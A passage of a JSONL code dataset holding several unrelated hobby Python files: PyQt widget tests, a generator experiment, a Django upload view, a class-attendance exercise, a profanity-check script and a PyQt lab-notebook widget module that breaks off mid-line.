setup[\"widget\"].hole.W1 == 0.32\n assert setup[\"test_obj\"].hole[0].W1 == 0.32\n\n def test_set_W2(self, setup):\n \"\"\"Check that the Widget allow to update W2\"\"\"\n setup[\"widget\"].lf_W2.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W2, \"0.33\")\n setup[\"widget\"].lf_W2.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W2 == 0.33\n assert setup[\"test_obj\"].hole[0].W2 == 0.33\n\n def test_set_W3(self, setup):\n \"\"\"Check that the Widget allow to update W3\"\"\"\n setup[\"widget\"].lf_W3.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W3, \"0.323\")\n setup[\"widget\"].lf_W3.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W3 == 0.323\n assert setup[\"test_obj\"].hole[0].W3 == 0.323\n\n def test_set_W4(self, setup):\n \"\"\"Check that the Widget allow to update W4\"\"\"\n setup[\"widget\"].lf_W4.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W4, \"0.334\")\n setup[\"widget\"].lf_W4.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W4 == 0.334\n assert setup[\"test_obj\"].hole[0].W4 == 0.334\n\n def test_set_H1(self, setup):\n \"\"\"Check that the Widget allow to update H1\"\"\"\n setup[\"widget\"].lf_H1.clear()\n QTest.keyClicks(setup[\"widget\"].lf_H1, \"0.35\")\n setup[\"widget\"].lf_H1.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.H1 == 0.35\n assert setup[\"test_obj\"].hole[0].H1 == 0.35\n\n def test_set_H2(self, setup):\n \"\"\"Check that the Widget allow to update H2\"\"\"\n setup[\"widget\"].lf_H2.clear()\n QTest.keyClicks(setup[\"widget\"].lf_H2, \"0.36\")\n setup[\"widget\"].lf_H2.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.H2 == 0.36\n assert setup[\"test_obj\"].hole[0].H2 == 0.36\n","sub_path":"Tests/GUI/DMachineSetup/PHole/test_PHoleM57.py","file_name":"test_PHoleM57.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314547372","text":"#def sub():\n# tally = 0\n# while True:\n# next = yield\n# if next is None:\n# return tally\n# tally += next\n\n#def master(tallies):\n# tally = yield from sub()\n# tallies.append(tally)\n# print(tallies)\n\n#tallies = []\n\n#acc = master(tallies)\n\n#try:\n# acc.send(None)\n# for i in range(4):\n# acc.send(i)\n\n\n# acc.send(None)\n#except StopIteration:\n# pass\n\n# ======================================\ndef m():\n for i in range(3):\n if not int(i) == 2:\n yield i\n else:\n return 33\n\ndef f():\n while 1:\n result = yield from m()\n print(result)\ng = f()\nprint(type(g))\n\n","sub_path":"backend/python/yield/yield_from.py","file_name":"yield_from.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"182602450","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom aksharaklp import settings\nfrom aksharaklp.fileuploadapp.models import Document\nfrom aksharaklp.fileuploadapp.forms import DocumentForm\nfrom aksharaklp.fileuploadapp.filereader import read_file\nfrom aksharaklp.fileuploadapp.dataanalyzer import analyze_data\nfrom django.contrib.auth.decorators import login_required\n\ndef list(request):\n # Handle file upload\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n \n if form.is_valid():\n newdoc = Document(docfile = request.FILES['docfile'])\n newdoc.save()\n read_file(settings.PROJECT_ROOT+newdoc.docfile.url)\n\n # Redirect to the document list after POST\n return HttpResponseRedirect(reverse('aksharaklp.fileuploadapp.views.list'))\n else:\n form = DocumentForm() # A empty, unbound form\n\n # Load documents for the list page\n documents = Document.objects.all()\n\n # Render list page with the documents and the form\n return render_to_response(\n 'fileuploadapp/list.html',\n {'documents': documents, 'form': form},\n context_instance=RequestContext(request)\n )\n\ndef analyze(request):\n print(\"Start analysis ===>\");\n #handle data analysis call\n if request.method == 'GET':\n analysis = analyze_data()\n \n # Redirect to the document list \n form = DocumentForm() # A empty, unbound form\n\n # Load documents for the list page\n documents = Document.objects.all()\n\n return render_to_response(\n 'fileuploadapp/list.html',\n {'documents': documents, 'form': form, 'analysis': analysis},\n context_instance=RequestContext(request)\n )","sub_path":"aksharaklp/aksharaklp/fileuploadapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430675875","text":"\"\"\"\nDeseja-se fazer um levantamento a respeito da ausência de alunos a primeira prova de \nprogramação de computadores para cada uma das 14 turmas existentes. Para cada turma \né fornecido um conjunto de valores, sendo que os dois primeiros valores do conjunto \ncorresponde a identificação da turma (A, B, C ...) e ao número de alunos matriculados, \ne os demais valores deste conjunto contem o número de matricula do aluno e a letra A ou \nP para o caso de o aluno estar ausente ou presente, respectivamente. Fazer um algoritmo que:\na) para cada turma, calcule a porcentagem de ausência e escreva a identificado da turma e \na porcentagem calculada.\nb) determine e escreva quantas turmas tiveram porcentagem de ausência superior a 5%.\n\"\"\"\n#import readchar\n\ndef main():\n TURMA = '' #identificacao da turma\n ALUNOS = 0 #numero de alunos matriculados na turma\n MATRICULA = \"\" #numero de matricula do aluno\n CHAMADA = '' # A ou P (ausente ou presente)\n QUANT_A = 0 #quantidade de alunos ausentes por turma\n QUANT_P = 0 #qtidade de alunos presentes por turma\n PORCENT = 0.0 #porcentagem de ausencia por turma\n N_TUR = 0 #contador para o numero de turmas\n N_ALU = 0 #cont para o numero de alunos por turma\n T = 0 #contador para turmas com ausencia > 5%\n #inicializacao dos acumuladores gerais\n N_TUR = 0 #contador ate 14 turmas\n #total de turmas com ausencia maior que 5%\n PORCENT = 0.0\n while (N_TUR!=3) :\n QUANT_A = 0\n QUANT_P = 0\n N_ALU = 0 # contador ate o numero de alunos da turma\n print(\"informe a turma : \")\n #TURMA = readchar.readchar()\n #print(TURMA)\n TURMA = input()\n print(\"informe o numero de alunos matriculados: \")\n ALUNOS = int(input())\n print(ALUNOS)\n while (N_ALU != ALUNOS):\n print(\"informe o numero de matricula: \")\n MATRICULA = int(input())\n print(MATRICULA)\n print(\"Chamada (P/A): \")\n #CHAMADA = readchar.readchar()\n #print(CHAMADA)\n CHAMADA = input()\n if(CHAMADA == 'P'):\n QUANT_P = QUANT_P + 1\n else:\n if(CHAMADA == 'A'):\n QUANT_A = QUANT_A + 1\n N_ALU = N_ALU + 1\n PORCENT = 100 * (float(QUANT_A) / float(N_ALU))\n print(\"Turma: \", TURMA,\"Faltas: \",PORCENT)\n if(PORCENT > 5):\n T = T + 1\n N_TUR = N_TUR + 1 #proxima turma\n print(\"Numero de turmas com ausencia maior que 5%: \", T)\n\nif __name__ == '__main__':\n main()","sub_path":"python/lst6.py","file_name":"lst6.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478516306","text":"import urllib\n\ndef read_text():\n\tquotes = open(\"quotes.txt\")\n\tcontents = quotes.read()\n\tquotes.close()\n\tcheck_profanity(contents)\n\t\ndef check_profanity(text_to_check):\n\tconnection = urllib.urlopen(\"http://www.wdyl.com/profanity?q=\"+text_to_check)\n\toutput = connection.read()\n\tprint(output)\n\tconnection.close()\n\nread_text()\n","sub_path":"check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377232119","text":"\"\"\" This module contains the custom widget used in labnote \"\"\"\n\n# Python import\nimport sqlite3\nimport sip\n\n# PyQt import\nfrom PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QFrame, QHBoxLayout, QPushButton, QAction, QMenu, \\\n QMessageBox, QAbstractItemView, QPlainTextEdit, QCompleter\nfrom PyQt5.QtGui import QPixmap, QFont, QStandardItem, QColor, QTextCharFormat, QBrush, QPainter, QPen, QIcon, \\\n QTextListFormat, QPainterPath, QTextDocument, QRegExpValidator, QTextCursor\nfrom PyQt5.QtCore import Qt, pyqtSignal, QModelIndex, QRectF, QEvent, QRegExp, QItemSelectionModel\n\n# Project import\nfrom labnote.core import stylesheet\nfrom labnote.interface.widget.view import DragDropTreeView\nfrom labnote.interface.widget.model import StandardItemModel\nfrom labnote.interface.dialog.category import Category, Subcategory\nfrom labnote.interface.widget.textedit import CompleterTextEdit, ImageTextEdit\nfrom labnote.interface.widget.lineedit import LineEdit\nfrom labnote.utils import database\nfrom labnote.core import sqlite_error, common\nfrom labnote.ui.widget.ui_texteditor import Ui_TextEditor\n\n# Constant definition\n\n# Reference type\nTYPE_ARTICLE = common.TYPE_ARTICLE\nTYPE_BOOK = common.TYPE_BOOK\nTYPE_CHAPTER = common.TYPE_CHAPTER\n\n# Category frame content type\nTYPE_LIBRARY = common.TYPE_LIBRARY\nTYPE_PROTOCOL = common.TYPE_PROTOCOL\n\n# Data type\nQT_LevelRole = common.QT_LevelRole\nQT_StateRole = common.QT_StateRole\n\n# Level type\nLEVEL_CATEGORY = common.LEVEL_CATEGORY\nLEVEL_SUBCATEGORY = common.LEVEL_SUBCATEGORY\nLEVEL_ENTRY = common.LEVEL_ENTRY\n\n\nclass NoEntryWidget(QWidget):\n \"\"\"Widget that indicate that no entry is selected \"\"\"\n\n def __init__(self):\n super(NoEntryWidget, self).__init__()\n # Set stylesheet\n stylesheet.set_style_sheet(self, \":/StyleSheet/Widget/style-sheet/widget/widget/no_entry_widget.qss\")\n\n # Setting up the widget\n no_entry_pixmap = QPixmap(\":/Icons/MainWindow/icons/main-window/no_entry_selected.png\")\n lbl_no_entry_image = QLabel()\n lbl_no_entry_image.setAlignment(Qt.AlignCenter)\n\n lbl_no_entry_image.setPixmap(no_entry_pixmap.scaled(16, 16, Qt.KeepAspectRatio))\n\n lbl_no_entry = QLabel(\"No entry selected\")\n lbl_no_entry.setAlignment(Qt.AlignCenter)\n\n # Setting up the layout\n main_layout = QVBoxLayout(self)\n main_layout.addWidget(lbl_no_entry_image)\n main_layout.addWidget(lbl_no_entry)\n\n\nclass CategoryFrame(QWidget):\n \"\"\" Class that show and manage the data in the category TreeView \"\"\"\n\n # Signal definition\n delete = pyqtSignal(str) # Delete the entry\n entry_selected = pyqtSignal(str) # A reference is selected in the treeview\n selection_changed = pyqtSignal(QModelIndex) # Everything is selected in the treeview\n list_displayed = pyqtSignal() # The list showed in the treeview\n\n def __init__(self, title, frame_type):\n super(CategoryFrame, self).__init__()\n self.setFixedWidth(240)\n self.frame = QFrame()\n\n # Set style sheet\n self.frame.setStyleSheet(\"\"\"\n .QFrame {\n border-left: none;\n border-top: none;\n border-bottom: none;\n border-right: 0.5px solid rgb(212, 212, 212);\n background-color: rgb(246, 246, 246);\n }\n \"\"\")\n\n # Set class variable\n self.frame_type = frame_type\n\n # Create the interface\n self.layout = QVBoxLayout()\n self.layout.setContentsMargins(0, 0, 0, 0)\n\n # Create the title label\n self.lbl_title = QLabel(title)\n self.lbl_title.setStyleSheet(\"\"\"\n QLabel {\n color: rgb(129, 129, 129);\n font: bold 12px;\n }\n \"\"\")\n self.layout.addWidget(self.lbl_title)\n self.layout.setSpacing(0)\n\n # Create the treeview\n self.view_tree = DragDropTreeView()\n self.view_tree.setStyleSheet(\"\"\"\n QTreeView {\n border: none;\n background-color: rgb(246, 246, 246);\n }\n \n QTreeView::item:selected {\n background-color: rgb(216, 216, 216);\n color: black;\n }\n\n QTreeView::branch:selected {\n background-color: rgb(216, 216, 216);\n }\n \n QTreeView::branch::closed::has-children {\n image: url(:/Icons/Library/icons/library/branch-close.png);\n }\n\n QTreeView::branch::open::has-children {\n image: url(:/Icons/Library/icons/library/branch-open.png);\n }\n \"\"\")\n self.layout.addWidget(self.view_tree)\n\n # Create the buttons\n self.layout_button = QHBoxLayout()\n self.layout_button.setSpacing(0)\n self.btn_add = QPushButton(\"+\")\n self.btn_add.setStyleSheet(\"\"\"\n QPushButton {\n /* Border and background color */\n background-color: none;\n border: none;\n\n /* Text color and font */\n font-family: Al Bayan;\n font: 24pt;\n color: rgb(129, 129, 129);\n\n /* Button height and width */\n width: 25px;\n min-width: 25px;\n max-height: 25px;\n\n height: 25px;\n min-height: 25px;\n max-height: 25px;\n }\n\n QPushButton:pressed {\n /* Border and background color */\n background-color: none;\n border: none;\n color: rgb(72, 72, 72);\n }\n \"\"\")\n self.btn_add.setEnabled(False)\n self.layout_button.addWidget(self.btn_add)\n self.btn_manage = QPushButton()\n self.btn_manage.setStyleSheet(\"\"\"\n QPushButton {\n border-image: url(:/Icons/MainWindow/icons/main-window/settings.png);\n max-width: 24px;\n min-width: 24px;\n max-height: 16px;\n min-height: 16px;\n }\n\n QPushButton:pressed {\n border-image: url(:/Icons/MainWindow/icons/main-window/settings_pressed.png);\n }\n\n\n QPushButton:pressed {\n /* Border and background color */\n background-color: none;\n border: none;\n }\n\n QPushButton::menu-indicator {\n height: 0px;\n width: 0px;\n }\n \"\"\")\n self.layout_button.addWidget(self.btn_manage)\n self.layout_button.addStretch()\n self.layout.addLayout(self.layout_button)\n\n self.frame.setLayout(self.layout)\n\n # Create the manage button menu\n self.manage_menu = QMenu(self)\n self.manage_menu.setFont(QFont(self.font().family(), 13, QFont.Normal))\n self.act_create_category = QAction(\"Create category\", self)\n self.act_create_category.triggered.connect(self.create_category)\n self.manage_menu.addAction(self.act_create_category)\n self.act_update_category = QAction(\"Update category\", self)\n self.act_update_category.triggered.connect(self.update_category)\n self.act_update_category.setEnabled(False)\n self.manage_menu.addAction(self.act_update_category)\n self.act_delete_category = QAction(\"Delete category\", self)\n self.act_delete_category.triggered.connect(self.delete_category)\n self.act_delete_category.setEnabled(False)\n self.manage_menu.addAction(self.act_delete_category)\n self.manage_menu.addSeparator()\n self.act_create_subcategory = QAction(\"Create subcategory\", self)\n self.act_create_subcategory.triggered.connect(self.create_subcategory)\n self.manage_menu.addAction(self.act_create_subcategory)\n self.act_update_subcategory = QAction(\"Update subcategory\", self)\n self.act_update_subcategory.triggered.connect(self.update_subcategory)\n self.act_update_subcategory.setEnabled(False)\n self.manage_menu.addAction(self.act_update_subcategory)\n self.act_delete_subcategory = QAction(\"Delete subcategory\", self)\n self.act_delete_subcategory.triggered.connect(self.delete_subcategory)\n self.act_delete_subcategory.setEnabled(False)\n self.manage_menu.addAction(self.act_delete_subcategory)\n self.manage_menu.addSeparator()\n\n if self.frame_type == TYPE_LIBRARY:\n delete_text = \"Delete reference\"\n elif self.frame_type == TYPE_PROTOCOL:\n delete_text = \"Delete protocol\"\n self.act_delete = QAction(delete_text, self)\n self.act_delete.triggered.connect(self.delete_entry)\n self.act_delete.setEnabled(False)\n self.manage_menu.addAction(self.act_delete)\n self.btn_manage.setMenu(self.manage_menu)\n\n # Edit and selections properties\n self.view_tree.header().hide()\n self.view_tree.setSelectionMode(QAbstractItemView.SingleSelection)\n self.view_tree.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.view_tree.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.view_tree.setDragDropMode(QAbstractItemView.InternalMove)\n\n # Setup the main layout\n self.main_layout = QHBoxLayout()\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n self.main_layout.addWidget(self.frame)\n self.setLayout(self.main_layout)\n\n def update_category(self):\n \"\"\" Show a dialog to update a category \"\"\"\n\n # Get the category informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_category(index):\n name = index.data(Qt.DisplayRole)\n selected_id = index.data(Qt.UserRole)\n\n # Show the dialog\n category = Category(name, selected_id)\n category.lbl_title.setText(\"Update a category\")\n category.setWindowModality(Qt.WindowModal)\n category.setParent(self, Qt.Sheet)\n category.show()\n category.accepted.connect(self.show_list)\n\n def create_category(self):\n \"\"\" Show a sheet dialog to create a new category \"\"\"\n category = Category()\n category.lbl_title.setText(\"Create a new category\")\n category.setWindowModality(Qt.WindowModal)\n category.setParent(self, Qt.Sheet)\n category.show()\n category.accepted.connect(self.show_list)\n\n def delete_category(self):\n \"\"\" Delete an existing category \"\"\"\n\n # Get the category informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_category(index):\n selected_id = index.data(Qt.UserRole)\n\n try:\n database.delete_category(selected_id)\n except sqlite3.Error as exception:\n error_code = sqlite_error.sqlite_err_handler(str(exception))\n\n if error_code == sqlite_error.FOREIGN_KEY_CODE:\n message = QMessageBox()\n message.setWindowTitle(\"LabNote\")\n message.setText(\"Unable to delete category\")\n message.setInformativeText(\"Only empty category can be deleted.\")\n message.setIcon(QMessageBox.Information)\n message.setStandardButtons(QMessageBox.Ok)\n message.exec()\n return\n else:\n message = QMessageBox(QMessageBox.Warning, \"Error deleting the category\",\n \"An error occurred while deleting the category.\", QMessageBox.Ok)\n message.setWindowTitle(\"LabNote\")\n message.setDetailedText(str(exception))\n message.exec()\n return\n self.show_list()\n\n def create_subcategory(self):\n \"\"\" Show a sheet dialog to create a new subcategory \"\"\"\n category = Subcategory()\n category.lbl_title.setText(\"Create a new subcategory\")\n category.setWindowModality(Qt.WindowModal)\n category.setParent(self, Qt.Sheet)\n category.show()\n category.accepted.connect(self.show_list)\n\n def update_subcategory(self):\n \"\"\" Show a dialog to update a category \"\"\"\n\n # Get the subcategory informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_subcategory(index):\n name = index.data(Qt.DisplayRole)\n selected_id = index.data(Qt.UserRole)\n\n # Show the dialog\n subcategory = Subcategory(name, selected_id)\n subcategory.lbl_title.setText(\"Update a subcategory\")\n subcategory.setWindowModality(Qt.WindowModal)\n subcategory.setParent(self, Qt.Sheet)\n subcategory.show()\n subcategory.accepted.connect(self.show_list)\n\n def delete_subcategory(self):\n \"\"\" Delete a subcategory \"\"\"\n # Get the subcategory informations\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_subcategory(index):\n selected_id = index.data(Qt.UserRole)\n\n try:\n database.delete_subcategory(selected_id)\n except sqlite3.Error as exception:\n error_code = sqlite_error.sqlite_err_handler(str(exception))\n\n if error_code == sqlite_error.FOREIGN_KEY_CODE:\n message = QMessageBox()\n message.setWindowTitle(\"LabNote\")\n message.setText(\"Unable to delete subcategory\")\n message.setInformativeText(\"Only empty subcategory can be deleted.\")\n message.setIcon(QMessageBox.Information)\n message.setStandardButtons(QMessageBox.Ok)\n message.exec()\n return\n else:\n message = QMessageBox(QMessageBox.Warning, \"Error deleting the subcategory\",\n \"An error occurred while deleting the subcategory.\", QMessageBox.Ok)\n message.setWindowTitle(\"LabNote\")\n message.setDetailedText(str(exception))\n message.exec()\n return\n self.show_list()\n\n def delete_entry(self):\n \"\"\" Delete the current entry \"\"\"\n index = self.view_tree.selectionModel().currentIndex()\n\n if self.is_entry(index):\n ref_uuid = index.data(Qt.UserRole)\n self.delete.emit(ref_uuid)\n\n def show_list(self):\n \"\"\" Show the category, subcategory and entry list \"\"\"\n\n entry_list = None\n\n try:\n if self.frame_type == TYPE_LIBRARY:\n entry_list = database.select_reference_category()\n elif self.frame_type == TYPE_PROTOCOL:\n entry_list = database.select_protocol_category()\n\n except sqlite3.Error as exception:\n message = QMessageBox(QMessageBox.Warning, \"Error while loading data\",\n \"An error occurred while loading the references data.\", QMessageBox.Ok)\n message.setWindowTitle(\"LabNote\")\n message.setDetailedText(str(exception))\n message.exec()\n return\n\n model = StandardItemModel()\n root = model.invisibleRootItem()\n\n if entry_list:\n for category in entry_list:\n category_item = QStandardItem(category.name)\n category_item.setData(category.id, Qt.UserRole)\n category_item.setData(self.prepare_category_data_string(category.id), QT_StateRole)\n category_item.setData(LEVEL_CATEGORY, QT_LevelRole)\n category_item.setFont(QFont(self.font().family(), 12, QFont.Bold))\n category_item.setDragEnabled(False)\n root.appendRow(category_item)\n\n if category.subcategory:\n for subcategory in category.subcategory:\n subcategory_item = QStandardItem(subcategory.name)\n subcategory_item.setData(subcategory.id, Qt.UserRole)\n subcategory_item.setData(self.prepare_subcategory_data_string(subcategory.id), QT_StateRole)\n subcategory_item.setData(LEVEL_SUBCATEGORY, QT_LevelRole)\n subcategory_item.setDragEnabled(False)\n category_item.appendRow(subcategory_item)\n\n if subcategory.entry:\n for entry in subcategory.entry:\n author = None\n label = \"\"\n if entry.author:\n author_list = entry.author.split(',')\n label = \"{}\".format(author_list[0].split()[len(author_list[0].split()) - 1])\n if entry.year:\n if label != \"\":\n label = \"{} ({})\".format(label, entry.year)\n else:\n label = \"({})\".format(entry.year)\n if entry.title:\n if label != \"\":\n label = \"{}, {}\".format(label, entry.title)\n else:\n label = \"{}\".format(entry.title)\n reference_item = QStandardItem(label)\n reference_item.setData(entry.uuid, Qt.UserRole)\n reference_item.setData(LEVEL_ENTRY, QT_LevelRole)\n reference_item.setForeground(QColor(96, 96, 96))\n subcategory_item.appendRow(reference_item)\n if category.entry:\n for reference in category.entry:\n author = None\n label = \"\"\n if reference.author:\n author = reference.author.split()[0]\n label = \"{}\".format(author)\n if reference.year:\n if label != \"\":\n label = \"{} ({})\".format(label, reference.year)\n else:\n label = \"({})\".format(reference.year)\n if reference.title:\n if label != \"\":\n label = \"{}, {}\".format(label, reference.title)\n else:\n label = \"{}\".format(reference.title)\n reference_item = QStandardItem(label)\n reference_item.setData(reference.uuid, Qt.UserRole)\n reference_item.setData(LEVEL_ENTRY, QT_LevelRole)\n reference_item.setForeground(QColor(96, 96, 96))\n category_item.appendRow(reference_item)\n\n self.view_tree.setModel(model)\n self.view_tree.selectionModel().currentChanged.connect(self.selection_change)\n self.list_displayed.emit()\n\n def selection_change(self):\n # Get the category informations\n index = self.view_tree.selectionModel().currentIndex()\n hierarchy_level = self.get_hierarchy_level(index)\n\n if hierarchy_level == 1:\n self.act_update_subcategory.setEnabled(False)\n self.act_delete_subcategory.setEnabled(False)\n self.act_update_category.setEnabled(True)\n self.act_delete_category.setEnabled(True)\n self.act_delete.setEnabled(False)\n self.btn_add.setEnabled(True)\n elif hierarchy_level == 2:\n self.act_update_category.setEnabled(False)\n self.act_delete_category.setEnabled(False)\n self.act_delete.setEnabled(False)\n self.btn_add.setEnabled(True)\n if index.data(QT_LevelRole) == LEVEL_ENTRY:\n self.entry_selected.emit(index.data(Qt.UserRole))\n self.act_delete.setEnabled(True)\n else:\n self.act_update_subcategory.setEnabled(True)\n self.act_delete_subcategory.setEnabled(True)\n elif hierarchy_level == 3:\n self.act_update_subcategory.setEnabled(False)\n self.act_delete_subcategory.setEnabled(False)\n self.act_update_category.setEnabled(False)\n self.act_delete_category.setEnabled(False)\n self.act_delete.setEnabled(True)\n self.btn_add.setEnabled(True)\n self.entry_selected.emit(index.data(Qt.UserRole))\n\n def get_subcategory(self, index):\n \"\"\" Return the current subcategory id\n\n :return int: Subcategory id\n \"\"\"\n\n hierarchy_level = self.get_hierarchy_level(index)\n\n if hierarchy_level == 2:\n return index.data(Qt.UserRole)\n elif hierarchy_level == 3:\n return index.parent().data(Qt.UserRole)\n else:\n return None\n\n def is_category(self, index):\n \"\"\" Return true if the index is a category\n\n :param index: Item index\n :type index: QModelIndex\n :return bool: True if the index is a category\n \"\"\"\n if index.data(QT_LevelRole) == LEVEL_CATEGORY:\n return True\n return False\n\n def is_subcategory(self, index):\n \"\"\" Return true if the index is a subcategory\n\n :param index: Item index\n :type index: QModelIndex\n :return bool: True if the index is a subcategory\n \"\"\"\n if index.data(QT_LevelRole) == LEVEL_SUBCATEGORY:\n return True\n return False\n\n def is_entry(self, index):\n \"\"\" Return true if the index is a reference\n\n :param index: Item index\n :type index: QModelIndex\n :return bool: True if the index is a reference\n \"\"\"\n if index.data(QT_LevelRole) == LEVEL_ENTRY:\n return True\n return False\n\n def get_hierarchy_level(self, index):\n \"\"\" Get the hierarchy level for the index\n\n :param index: Item index\n :type index: QModelIndex\n :return int: Hierarchy level\n \"\"\"\n hierarchy_level = 1\n seek_root = index\n\n while seek_root.parent() != QModelIndex():\n seek_root = seek_root.parent()\n hierarchy_level = hierarchy_level + 1\n\n return hierarchy_level\n\n def get_category(self, index):\n \"\"\" Return the current category id\n\n :return int: Category id\n \"\"\"\n\n hierarchy_level = self.get_hierarchy_level(index)\n\n if hierarchy_level == 1:\n return index.data(Qt.UserRole)\n elif hierarchy_level == 2:\n return index.parent().data(Qt.UserRole)\n elif hierarchy_level == 3:\n parent = index.parent()\n return parent.parent().data(Qt.UserRole)\n else:\n return None\n\n def get_user_data(self):\n \"\"\" Return the data in the current item for user role \"\"\"\n index = self.view_tree.selectionModel().currentIndex()\n return index.data(Qt.UserRole)\n\n def get_current_level(self):\n \"\"\" Return the level of the current item \"\"\"\n index = self.view_tree.selectionModel().currentIndex()\n return index.data(QT_LevelRole)\n\n def prepare_category_data_string(self, id):\n \"\"\" Add a 'C' before the category data string\n\n This is required to save the treeview state as the category and subcategory id are identical\n\n :param id: Category id\n :type id: int\n :return str: C + id\n \"\"\"\n return \"C{}\".format(id)\n\n def prepare_subcategory_data_string(self, id):\n \"\"\" Add an 'S' before the subcategory data string\n\n This is required to save the treeview state as the category and subcategory id are identical\n\n :param id: Subcategory id\n :type id: int\n :return str: S + id\n \"\"\"\n return \"S{}\".format(id)\n\n\nclass TextEditor(QWidget, Ui_TextEditor):\n \"\"\" Complex text editor \"\"\"\n\n # Class variable definition\n width_height_ratio = 1\n\n def __init__(self, editor_type, tag_list=None, reference_list=None, dataset_list=None, protocol_list=None):\n super(TextEditor, self).__init__()\n # Set class variable\n self.tag_list = tag_list\n self.reference_list = reference_list\n self.dataset_list = dataset_list\n self.protocol_list = protocol_list\n self.editor_type = editor_type\n\n self.setupUi(self)\n self.init_ui()\n self.init_connection()\n\n def init_ui(self):\n # Insert title text edit\n self.txt_title = QPlainTextEdit()\n font = QFont()\n font.setBold(True)\n font.setPointSize(16)\n self.txt_title.setFont(font)\n self.txt_title.setPlaceholderText(\"Untitled experiment\")\n self.txt_title.setFixedHeight(48)\n self.title_layout.insertWidget(0, self.txt_title)\n self.title_layout.setStretch(0, 10)\n\n # Insert key text edit\n self.txt_key = LineEdit()\n self.txt_key.setPlaceholderText(\"Experiment key\")\n self.txt_key.setStyleSheet(\" QLineEdit { border: none; padding-left: 2px; } \")\n self.txt_key.setVisible(False)\n self.layout().insertWidget(2, self.txt_key)\n\n # Insert descrition text edit\n self.txt_description = CompleterTextEdit(tag_list=self.tag_list)\n self.txt_description.setPlaceholderText(\"Objectives of the experiment\")\n self.txt_description.setFixedHeight(74)\n self.layout().insertWidget(3, self.txt_description)\n\n # Insert textedit in layout\n self.txt_body = ImageTextEdit(editor_type=self.editor_type, reference_list=self.reference_list,\n dataset_list=self.dataset_list, protocol_list=self.protocol_list)\n self.txt_body.setStyleSheet(\"border-top: 0.5px solid rgb(212, 212, 212)\")\n self.layout().insertWidget(4, self.txt_body, 10)\n\n # Set button groups\n self.btn_bold.setProperty(\"Menu\", False)\n self.btn_italic.setProperty(\"Menu\", False)\n self.btn_underline.setProperty(\"Menu\", False)\n self.btn_strikethrough.setProperty(\"Menu\", False)\n self.btn_superscript.setProperty(\"Menu\", False)\n self.btn_subscript.setProperty(\"Menu\", False)\n self.btn_center.setProperty(\"Menu\", False)\n self.btn_left.setProperty(\"Menu\", False)\n self.btn_right.setProperty(\"Menu\", False)\n self.btn_justify.setProperty(\"Menu\", False)\n self.btn_style.setProperty(\"Menu\", True)\n self.btn_color.setProperty(\"Menu\", True)\n self.btn_highlight.setProperty(\"Menu\", True)\n self.btn_list.setProperty(\"Menu\", True)\n self.btn_color.setProperty(\"IconOnly\", True)\n self.btn_highlight.setProperty(\"IconOnly\", True)\n\n # Image size line edit\n validator = QRegExpValidator(QRegExp(\"^[0-9]{0,4}$\"))\n self.txt_width.setValidator(validator)\n self.txt_height.setValidator(validator)\n\n # Style menu\n self.act_part = QAction(\"Part\", self)\n self.act_part.setFont(QFont(self.font().family(), 20, 75))\n self.act_section = QAction(\"Section\", self)\n self.act_section.setFont(QFont(self.font().family(), 16, 75))\n self.act_subsection = QAction(\"Subsection\", self)\n self.act_subsection.setFont(QFont(self.font().family(), 14, 75))\n self.act_subsubsection = QAction(\"Subsubsection\", self)\n self.act_subsubsection.setFont(QFont(self.font().family(), 12, 75))\n self.act_body = QAction(\"Body\", self)\n self.act_body.setFont(QFont(self.font().family(), 12, 50))\n self.act_note = QAction(\"Note\", self)\n self.act_note.setFont(QFont(self.font().family(), 11, 50))\n\n self.style_menu = QMenu(self)\n self.style_menu.addAction(self.act_part)\n self.style_menu.addAction(self.act_section)\n self.style_menu.addAction(self.act_subsection)\n self.style_menu.addAction(self.act_subsubsection)\n self.style_menu.addAction(self.act_body)\n self.style_menu.addAction(self.act_note)\n self.btn_style.setMenu(self.style_menu)\n\n # Highlight color menu\n self.act_clear_highlight = QAction(\"Clear\", self)\n clear_highlight_icon = self.draw_color(Qt.white, Qt.lightGray)\n self.act_clear_highlight.setIcon(clear_highlight_icon)\n\n self.act_red_highlight = QAction(\"Red\", self)\n red_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['red'].color, common.HIGHLIGHT_COLOR['red'].dark_shade)\n self.act_red_highlight.setIcon(red_highlight_icon)\n\n self.act_orange_highlight = QAction(\"Orange\", self)\n orange_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['orange'].color, common.HIGHLIGHT_COLOR['orange'].dark_shade)\n self.act_orange_highlight.setIcon(orange_highlight_icon)\n\n self.act_yellow_highlight = QAction(\"Yellow\", self)\n yellow_highlight_icon = self.draw_color(\n 